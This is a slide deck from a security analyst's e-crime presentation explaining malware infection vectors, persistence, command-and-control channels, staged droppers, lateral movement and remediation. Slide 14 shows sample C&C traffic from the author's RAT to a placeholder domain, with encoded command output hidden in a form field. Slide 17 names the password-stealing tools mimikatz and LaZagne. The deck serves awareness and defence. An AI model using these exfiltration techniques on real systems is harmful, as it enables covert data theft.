![Page 1: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/1.jpg)
A few bits about MalwareA story about trojan horses and rats.
![Page 2: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/2.jpg)
$ whoami
• Michael Hendrickx• Senior Security Analyst @ HelpAG• Vulnerability Assessments• Social Engineering • Presentations • Created new undetected* RAT for the company• Belgian
* Until now
![Page 3: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/3.jpg)
Malware attacks: a real threat
• Malware have caused a lot of damage• Many names: RAT’s, virus, Trojan,
rootkit, ransomware, …• Examples: Cryptolocker, Zeus,
BlackEnergy, …
• Targets differentplatforms:• Browsers• Smartphones• PC’s
![Page 4: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/4.jpg)
Malware attacks: stages
• Malware attacks comes in 2 stages
Infection
Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
Persistence
AV evasion, persistence, looting, CNC connectivity,
lateral movement
“you’re in trouble”
![Page 5: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/5.jpg)
Malware attacks: infection
• Stage 1: modes of Infection
Exploited Software Bugs
(Spear) phishing
Waterhole attack
Malicious USB
![Page 6: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/6.jpg)
Malware attacks: infection
• Exploited software bugs• Attacker hacks into vulnerable service• Could be anything:• SQL injection on website leads to code execution• Poorly implemented upload functionality• Unpatched server software• Man in the Middle• Weak passwords• …
![Page 7: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/7.jpg)
Malware attacks: infection
• Spear phishing• Very specific message to single or very few victims• Holds malicious payload• Macro, PDF, renamed files,
trojaned archives, …• Or, links to malicious file:• Needs to be downloaded, won’t
get caught by your AV.
![Page 8: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/8.jpg)
Malware attacks: infection
• Waterhole attack• Indirect targeted attack• Attacker compromises sites that the victim probably visits.• Exploits outdated browser or plugins• Forces install of malware
“your flash player is outdated”“you should update Java”
![Page 9: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/9.jpg)
Malware attacks: infection
• Evil USB dongle• USB peripheral can be anything• USB hard drive / dongle• Keyboard, WIFI / network adapter,
Microphone, …• Hub with any of the above• Example: USB rubber ducky• Looks like dongle, is a keyboard• Types 1000 words per minute• Is only 30 USD
![Page 10: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/10.jpg)
Malware attacks: stages
• On to stage 2:
Infection
Exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
Persistence
AV evasion, persistence, looting, CNC connectivity,
lateral movement
![Page 11: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/11.jpg)
Malware attacks: persistence
• Stage 2: Persistence• Execution persistence• Ensure that our malware keeps on running• CnC Connectivity• Listen for commands• AV Evasion / Hiding• To prevent malware from being detected, removed• Lateral movement• Infect more machines
![Page 12: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/12.jpg)
Malware attacks: Execution persistence
• Ensure malware keeps on running• Startup folder• Registry keys• Automatic Services• Browser plugins / helper objects• You’re re-infected whenever the browser is
opened• Infected document templates• Every time a word/ppt/excel file is opened or created, you’re re-infected.
Use Microsoft’s Autoruns to see what processes start upon startup. (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx)
![Page 13: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/13.jpg)
Malware attacks: CnC connectivity
• Direct traffic• Probably (hopefully) detected and blocked
• HTTP Tunnel• May get detected by L7 firewalls• “deep packet inspection”, pretty shallow
• HTTPS• Difficult to see what’s happening, unless MITM.
• DNS Tunneling• Usually gets “proxied” to target DNS server• Do you monitor anomalies?
• Peer to peer WIFI network
Hi, I’m an ad-hoc wifi network
Up to 10 – 20 meters
![Page 14: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/14.jpg)
Malware attacks: hagrat CnC
• Encode / Encrypt / Obfuscate traffic
POST /css/cc.aspx HTTP/1.1Accept: text/html;q=0.8,application/xml,*/*Accept-Language: en-gb;q=0.8,enContent-Type: application/x-www-form-urlencodedCookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)Host: www.thisisafakedomain.comContent-Length: 277Connection: Keep-Alive
__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.
1:Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\hendrickx\ownCloud>dir c:/Invalid switch - "".
C:\Users\hendrickx\ownCloud>
![Page 15: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/15.jpg)
Malware attacks: hiding
• Hiding• Download multiple stages
Dropper
Malicious Payload
(Real Virus)
Infect victim
Can I reach the Internet?
Does payload get detected?
![Page 16: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/16.jpg)
Malware attacks: hiding
• Multi stage download ensures correct victim
Malicious Payload
(Real Virus)
Infect victim
Can I reach the Internet?
Dropper
Innocent Payload
This is not the IP / Company / country I’m targeting
Cool, I’ll install it
Bingo!
![Page 17: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/17.jpg)
Malware attacks: lateral movement
• Exfiltration of information• Documents (%userprofile%\documents)• Passwords (mimikatz, Lazagne)• Browser history• Emails, files, …
• Recon / Infect the network• Ping other machines• File shares• (Sharepoint) portals
![Page 18: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/18.jpg)
Remediation
• Human factor: don’t get infected• Social Engineering exercises• Awareness• Alerting IT security (“Support, I think I did
something wrong”)
• Technical factor: prevent, detect, destroy• Tight controls on end points• Monitor inbound programs (attachments, downloads, …)• Monitor network usage • DNS Anomalies, unidentified protocols, …• Regular scanning with AV, IOC detectors, …• Such as Loki: (https://github.com/Neo23x0/Loki)
![Page 19: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/19.jpg)
Thank you!
Questions?
Don’t accept any USB dongles from me!
![Page 20: ECrime presentation - A few bits about malware](https://reader035.vdocuments.mx/reader035/viewer/2022070522/58eeb5ec1a28abaf628b45cb/html5/thumbnails/20.jpg)
CONTACT US | WWW.HELPAG.COM | [email protected] DUBAI, UAEARJAAN OFFICE TOWER, OFFICE 1201 / 1208, PO BOX 500741T +971 4 440 5666F +971 4 363 6742
ABU DHABI, UAESALAM HQ BLDG, BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195T +971 2 644 3398F +971 2 639 1155
DOHA, QATARAL DAFNA – PALM TOWEROFFICE 4803, WEST BAY, P.O. BOX 31316T +974 4432 8067 F +974 4432 8069